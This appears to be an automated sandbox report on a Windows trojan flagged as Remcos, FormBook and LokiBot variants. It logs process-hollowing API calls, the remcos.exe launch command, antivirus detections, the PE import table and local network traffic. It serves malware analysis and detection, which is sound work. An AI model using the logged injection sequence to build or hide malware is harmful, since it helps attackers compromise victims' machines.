current_directory: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
process_handle: 0x000002e4
inherit_handles: 0
success 1 0
1619628960.4325
CreateProcessInternalW
thread_identifier: 4072
thread_handle: 0x00000108
process_identifier: 4068
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000100
inherit_handles: 0
success 1 0
1619628960.4325
NtUnmapViewOfSection
process_identifier: 4068
region_size: 4096
process_handle: 0x00000100
base_address: 0x00400000
success 0 0
1619628960.4325
NtMapViewOfSection
section_handle: 0x00000110
process_identifier: 4068
commit_size: 131072
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000100
allocation_type: 0 ()
section_offset: 0
view_size: 131072
base_address: 0x00400000
success 0 0
1619628960.4325
NtGetContextThread
thread_handle: 0x00000108
success 0 0
1619628960.4325
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 4068
success 0 0
1619628960.4635
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 4068
success 0 0
1619628960.4635
CreateProcessInternalW
thread_identifier: 3128
thread_handle: 0x0000010c
process_identifier: 3124
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe" 2 4068 16948734
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x0000011c
inherit_handles: 0
success 1 0
1619628949.04125
CreateProcessInternalW
thread_identifier: 3908
thread_handle: 0x000000cc
process_identifier: 3904
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x000000d0
inherit_handles: 0
success 1 0
1619628949.072
CreateProcessInternalW
thread_identifier: 3948
thread_handle: 0x00000080
process_identifier: 3944
current_directory: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe
track: 1
command_line: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
process_handle: 0x00000084
inherit_handles: 1
success 1 0
1619628961.275625
CreateProcessInternalW
thread_identifier: 1832
thread_handle: 0x00000108
process_identifier: 3384
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000100
inherit_handles: 0
success 1 0
1619628961.275625
NtUnmapViewOfSection
process_identifier: 3384
region_size: 4096
process_handle: 0x00000100
base_address: 0x00400000
success 0 0
1619628961.275625
NtMapViewOfSection
section_handle: 0x00000110
process_identifier: 3384
commit_size: 131072
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000100
allocation_type: 0 ()
section_offset: 0
view_size: 131072
base_address: 0x00400000
success 0 0
1619628961.275625
NtGetContextThread
thread_handle: 0x00000108
success 0 0
1619628961.275625
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3384
success 0 0
1619628961.369625
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 3384
success 0 0
1619628961.400625
CreateProcessInternalW
thread_identifier: 3512
thread_handle: 0x0000010c
process_identifier: 3168
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe" 2 3384 16949640
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x0000011c
inherit_handles: 0
success 1 0
File has been identified by 56 AntiVirus engines on VirusTotal as malicious (50 out of 56 events)
Cynet Malicious (score: 100)
FireEye Generic.mg.632e3d1eedfc8164
CAT-QuickHeal Trojan.CKGENERIC
McAfee RDN/Generic.grp
Cylance Unsafe
VIPRE Trojan.Win32.Generic!BT
K7AntiVirus Trojan ( 005678511 )
Alibaba Trojan:Win32/FormBook.36aa18e4
K7GW Trojan ( 005678511 )
CrowdStrike win/malicious_confidence_80% (W)
Arcabit Trojan.Generic.D2057947
Invincea heuristic
BitDefenderTheta Gen:NN.ZelphiF.34128.QGW@aKk@V8ni
Cyren W32/Injector.FYAR-0144
Symantec Trojan.Gen.2
APEX Malicious
Avast Win32:Malware-gen
ClamAV Win.Trojan.LokiBot-7908075-0
Kaspersky HEUR:Trojan.Win32.Kryptik.gen
BitDefender Trojan.GenericKD.33913159
NANO-Antivirus Trojan.Win32.Stealer.hkqqhs
Paloalto generic.ml
MicroWorld-eScan Trojan.GenericKD.33913159
Tencent Win32.Trojan.Kryptik.Wlpm
Endgame malicious (high confidence)
Sophos Mal/Fareit-AA
DrWeb Trojan.PWS.Stealer.18836
Zillya Trojan.Injector.Win32.739536
TrendMicro TROJ_GEN.R014C0WES20
Trapmine malicious.moderate.ml.score
Emsisoft Trojan.GenericKD.33913159 (B)
SentinelOne DFI - Suspicious PE
MAX malware (ai score=84)
Antiy-AVL Trojan/Win32.Kryptik
Microsoft Trojan:Win32/FormBook.CM!MTB
AegisLab Trojan.Win32.Malicious.4!c
ZoneAlarm HEUR:Trojan.Win32.Kryptik.gen
GData Trojan.GenericKD.33913159
AhnLab-V3 Suspicious/Win.Delphiless.X2066
Acronis suspicious
VBA32 TScope.Trojan.Delf
ALYac Trojan.GenericKD.33913159
Ad-Aware Trojan.GenericKD.33913159
Malwarebytes Trojan.MalPack.DLF
ESET-NOD32 a variant of Win32/Injector.EMHC
TrendMicro-HouseCall TROJ_GEN.R014C0WES20
Rising Backdoor.Remcos!8.B89E (CLOUD)
Yandex Trojan.AvsArher.bTOmTw
Ikarus Trojan.Inject
MaxSecure Trojan.Malware.73736783.susgen
The process wscript.exe wrote an executable file to disk which it then attempted to execute (2 events)
file C:\Windows\SysWOW64\wscript.exe
file C:\Windows\System32\cmd.exe
Visual analysis
Binary image
No binary image: no binary visualization image was generated for this sample
Run screenshots
No run screenshots: no screenshots were captured while the sample ran

PE Compile Time

1992-06-20 06:22:17

Imports

Library kernel32.dll:
0x476150 VirtualFree
0x476154 VirtualAlloc
0x476158 LocalFree
0x47615c LocalAlloc
0x476160 GetVersion
0x476164 GetCurrentThreadId
0x476170 VirtualQuery
0x476174 WideCharToMultiByte
0x476178 MultiByteToWideChar
0x47617c lstrlenA
0x476180 lstrcpynA
0x476184 LoadLibraryExA
0x476188 GetThreadLocale
0x47618c GetStartupInfoA
0x476190 GetProcAddress
0x476194 GetModuleHandleA
0x476198 GetModuleFileNameA
0x47619c GetLocaleInfoA
0x4761a0 GetCommandLineA
0x4761a4 FreeLibrary
0x4761a8 FindFirstFileA
0x4761ac FindClose
0x4761b0 ExitProcess
0x4761b4 WriteFile
0x4761bc RtlUnwind
0x4761c0 RaiseException
0x4761c4 GetStdHandle
Library user32.dll:
0x4761cc GetKeyboardType
0x4761d0 LoadStringA
0x4761d4 MessageBoxA
0x4761d8 CharNextA
Library advapi32.dll:
0x4761e0 RegQueryValueExA
0x4761e4 RegOpenKeyExA
0x4761e8 RegCloseKey
Library oleaut32.dll:
0x4761f0 SysFreeString
0x4761f4 SysReAllocStringLen
0x4761f8 SysAllocStringLen
Library kernel32.dll:
0x476200 TlsSetValue
0x476204 TlsGetValue
0x476208 LocalAlloc
0x47620c GetModuleHandleA
Library advapi32.dll:
0x476214 RegQueryValueExA
0x476218 RegOpenKeyExA
0x47621c RegCloseKey
Library kernel32.dll:
0x476224 lstrcpyA
0x476228 WriteFile
0x476230 WaitForSingleObject
0x476234 VirtualQuery
0x476238 VirtualAlloc
0x47623c Sleep
0x476240 SizeofResource
0x476244 SetThreadLocale
0x476248 SetFilePointer
0x47624c SetEvent
0x476250 SetErrorMode
0x476254 SetEndOfFile
0x476258 ResetEvent
0x47625c ReadFile
0x476260 MulDiv
0x476264 LockResource
0x476268 LoadResource
0x47626c LoadLibraryA
0x476278 GlobalUnlock
0x47627c GlobalReAlloc
0x476280 GlobalHandle
0x476284 GlobalLock
0x476288 GlobalFree
0x47628c GlobalFindAtomA
0x476290 GlobalDeleteAtom
0x476294 GlobalAlloc
0x476298 GlobalAddAtomA
0x47629c GetVersionExA
0x4762a0 GetVersion
0x4762a4 GetTickCount
0x4762a8 GetThreadLocale
0x4762b0 GetSystemTime
0x4762b4 GetSystemInfo
0x4762b8 GetStringTypeExA
0x4762bc GetStdHandle
0x4762c0 GetProcAddress
0x4762c4 GetModuleHandleA
0x4762c8 GetModuleFileNameA
0x4762cc GetLocaleInfoA
0x4762d0 GetLocalTime
0x4762d4 GetLastError
0x4762d8 GetFullPathNameA
0x4762dc GetFileAttributesA
0x4762e0 GetDiskFreeSpaceA
0x4762e4 GetDateFormatA
0x4762e8 GetCurrentThreadId
0x4762ec GetCurrentProcessId
0x4762f0 GetCPInfo
0x4762f4 GetACP
0x4762f8 FreeResource
0x4762fc InterlockedExchange
0x476300 FreeLibrary
0x476304 FormatMessageA
0x476308 FindResourceA
0x47630c FindFirstFileA
0x476310 FindClose
0x47631c ExitThread
0x476320 EnumCalendarInfoA
0x47632c CreateThread
0x476330 CreateFileA
0x476334 CreateEventA
0x476338 CompareStringA
0x47633c CloseHandle
Library version.dll:
0x476344 VerQueryValueA
0x47634c GetFileVersionInfoA
Library gdi32.dll:
0x476354 UnrealizeObject
0x476358 StretchBlt
0x47635c SetWindowOrgEx
0x476360 SetWindowExtEx
0x476364 SetWinMetaFileBits
0x476368 SetViewportOrgEx
0x47636c SetViewportExtEx
0x476370 SetTextColor
0x476374 SetStretchBltMode
0x476378 SetROP2
0x47637c SetPixel
0x476380 SetMapMode
0x476384 SetEnhMetaFileBits
0x476388 SetDIBColorTable
0x47638c SetBrushOrgEx
0x476390 SetBkMode
0x476394 SetBkColor
0x476398 SelectPalette
0x47639c SelectObject
0x4763a0 SaveDC
0x4763a4 RestoreDC
0x4763a8 Rectangle
0x4763ac RectVisible
0x4763b0 RealizePalette
0x4763b4 Polyline
0x4763b8 PolyPolyline
0x4763bc PlayEnhMetaFile
0x4763c0 PatBlt
0x4763c4 MoveToEx
0x4763c8 MaskBlt
0x4763cc LineTo
0x4763d0 IntersectClipRect
0x4763d4 GetWindowOrgEx
0x4763d8 GetWinMetaFileBits
0x4763dc GetTextMetricsA
0x4763e8 GetStockObject
0x4763ec GetPixel
0x4763f0 GetPaletteEntries
0x4763f4 GetObjectA
0x476400 GetEnhMetaFileBits
0x476404 GetDeviceCaps
0x476408 GetDIBits
0x47640c GetDIBColorTable
0x476410 GetDCOrgEx
0x476418 GetClipBox
0x47641c GetBrushOrgEx
0x476420 GetBitmapBits
0x476424 ExtCreatePen
0x476428 ExcludeClipRect
0x47642c DeleteObject
0x476430 DeleteEnhMetaFile
0x476434 DeleteDC
0x476438 CreateSolidBrush
0x47643c CreatePenIndirect
0x476440 CreatePen
0x476444 CreatePalette
0x47644c CreateFontIndirectA
0x476450 CreateDIBitmap
0x476454 CreateDIBSection
0x476458 CreateCompatibleDC
0x476460 CreateBrushIndirect
0x476464 CreateBitmap
0x476468 CopyEnhMetaFileA
0x47646c BitBlt
Library user32.dll:
0x476474 CreateWindowExA
0x476478 WindowFromPoint
0x47647c WinHelpA
0x476480 WaitMessage
0x476484 ValidateRect
0x476488 UpdateWindow
0x47648c UnregisterClassA
0x476490 UnionRect
0x476494 UnhookWindowsHookEx
0x476498 TranslateMessage
0x4764a0 TrackPopupMenu
0x4764a8 ShowWindow
0x4764ac ShowScrollBar
0x4764b0 ShowOwnedPopups
0x4764b4 ShowCursor
0x4764b8 SetWindowsHookExA
0x4764bc SetWindowTextA
0x4764c0 SetWindowPos
0x4764c4 SetWindowPlacement
0x4764c8 SetWindowLongA
0x4764cc SetTimer
0x4764d0 SetScrollRange
0x4764d4 SetScrollPos
0x4764d8 SetScrollInfo
0x4764dc SetRect
0x4764e0 SetPropA
0x4764e4 SetParent
0x4764e8 SetMenuItemInfoA
0x4764ec SetMenu
0x4764f0 SetKeyboardState
0x4764f4 SetForegroundWindow
0x4764f8 SetFocus
0x4764fc SetCursor
0x476500 SetClipboardData
0x476504 SetClassLongA
0x476508 SetCapture
0x47650c SetActiveWindow
0x476510 SendMessageA
0x476514 ScrollWindowEx
0x476518 ScrollWindow
0x47651c ScreenToClient
0x476520 RemovePropA
0x476524 RemoveMenu
0x476528 ReleaseDC
0x47652c ReleaseCapture
0x476538 RegisterClassA
0x47653c RedrawWindow
0x476540 PtInRect
0x476544 PostQuitMessage
0x476548 PostMessageA
0x47654c PeekMessageA
0x476550 OpenClipboard
0x476554 OffsetRect
0x476558 OemToCharA
0x47655c MessageBoxA
0x476560 MessageBeep
0x476564 MapWindowPoints
0x476568 MapVirtualKeyA
0x47656c LoadStringA
0x476570 LoadKeyboardLayoutA
0x476574 LoadIconA
0x476578 LoadCursorA
0x47657c LoadBitmapA
0x476580 KillTimer
0x476584 IsZoomed
0x476588 IsWindowVisible
0x47658c IsWindowEnabled
0x476590 IsWindow
0x476594 IsRectEmpty
0x476598 IsIconic
0x47659c IsDialogMessageA
0x4765a0 IsChild
0x4765a4 IsCharAlphaNumericA
0x4765a8 IsCharAlphaA
0x4765ac InvalidateRect
0x4765b0 IntersectRect
0x4765b4 InsertMenuItemA
0x4765b8 InsertMenuA
0x4765bc InflateRect
0x4765c4 GetWindowTextA
0x4765c8 GetWindowRect
0x4765cc GetWindowPlacement
0x4765d0 GetWindowLongA
0x4765d4 GetWindowDC
0x4765d8 GetTopWindow
0x4765dc GetSystemMetrics
0x4765e0 GetSystemMenu
0x4765e4 GetSysColorBrush
0x4765e8 GetSysColor
0x4765ec GetSubMenu
0x4765f0 GetScrollRange
0x4765f4 GetScrollPos
0x4765f8 GetScrollInfo
0x4765fc GetPropA
0x476600 GetParent
0x476604 GetWindow
0x476608 GetMessageTime
0x47660c GetMenuStringA
0x476610 GetMenuState
0x476614 GetMenuItemInfoA
0x476618 GetMenuItemID
0x47661c GetMenuItemCount
0x476620 GetMenu
0x476624 GetLastActivePopup
0x476628 GetKeyboardState
0x476630 GetKeyboardLayout
0x476634 GetKeyState
0x476638 GetKeyNameTextA
0x47663c GetIconInfo
0x476640 GetForegroundWindow
0x476644 GetFocus
0x476648 GetDoubleClickTime
0x47664c GetDlgItem
0x476650 GetDesktopWindow
0x476654 GetDCEx
0x476658 GetDC
0x47665c GetCursorPos
0x476660 GetCursor
0x476664 GetClipboardData
0x476668 GetClientRect
0x47666c GetClassNameA
0x476670 GetClassInfoA
0x476674 GetCaretPos
0x476678 GetCapture
0x47667c GetActiveWindow
0x476680 FrameRect
0x476684 FindWindowA
0x476688 FillRect
0x47668c EqualRect
0x476690 EnumWindows
0x476694 EnumThreadWindows
0x47669c EndPaint
0x4766a0 EnableWindow
0x4766a4 EnableScrollBar
0x4766a8 EnableMenuItem
0x4766ac EmptyClipboard
0x4766b0 DrawTextA
0x4766b4 DrawMenuBar
0x4766b8 DrawIconEx
0x4766bc DrawIcon
0x4766c0 DrawFrameControl
0x4766c4 DrawFocusRect
0x4766c8 DrawEdge
0x4766cc DispatchMessageA
0x4766d0 DestroyWindow
0x4766d4 DestroyMenu
0x4766d8 DestroyIcon
0x4766dc DestroyCursor
0x4766e0 DeleteMenu
0x4766e4 DefWindowProcA
0x4766e8 DefMDIChildProcA
0x4766ec DefFrameProcA
0x4766f0 CreatePopupMenu
0x4766f4 CreateMenu
0x4766f8 CreateIcon
0x4766fc CloseClipboard
0x476700 ClientToScreen
0x476704 CheckMenuItem
0x476708 CallWindowProcA
0x47670c CallNextHookEx
0x476710 BeginPaint
0x476714 CharNextA
0x476718 CharLowerBuffA
0x47671c CharLowerA
0x476720 CharUpperBuffA
0x476724 CharToOemA
0x476728 AdjustWindowRectEx
Library kernel32.dll:
0x476734 Sleep
Library oleaut32.dll:
0x47673c SafeArrayPtrOfIndex
0x476740 SafeArrayGetUBound
0x476744 SafeArrayGetLBound
0x476748 SafeArrayCreate
0x47674c VariantChangeType
0x476750 VariantCopy
0x476754 VariantClear
0x476758 VariantInit
Library comctl32.dll:
0x476768 ImageList_Write
0x47676c ImageList_Read
0x47677c ImageList_DragMove
0x476780 ImageList_DragLeave
0x476784 ImageList_DragEnter
0x476788 ImageList_EndDrag
0x47678c ImageList_BeginDrag
0x476790 ImageList_Remove
0x476794 ImageList_DrawEx
0x476798 ImageList_Replace
0x47679c ImageList_Draw
0x4767ac ImageList_Add
0x4767b4 ImageList_Destroy
0x4767b8 ImageList_Create
0x4767bc InitCommonControls
Library comdlg32.dll:
0x4767c4 GetOpenFileNameA
Library kernel32.dll:
0x4767cc MulDiv

Hosts

No hosts contacted.

TCP

No TCP connections recorded.

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50568 114.114.114.114 53
192.168.56.101 53657 114.114.114.114 53
192.168.56.101 55368 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 63429 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 50002 224.0.0.252 5355
192.168.56.101 50534 224.0.0.252 5355
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 51963 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57756 224.0.0.252 5355
192.168.56.101 57874 224.0.0.252 5355
192.168.56.101 60384 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 62912 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.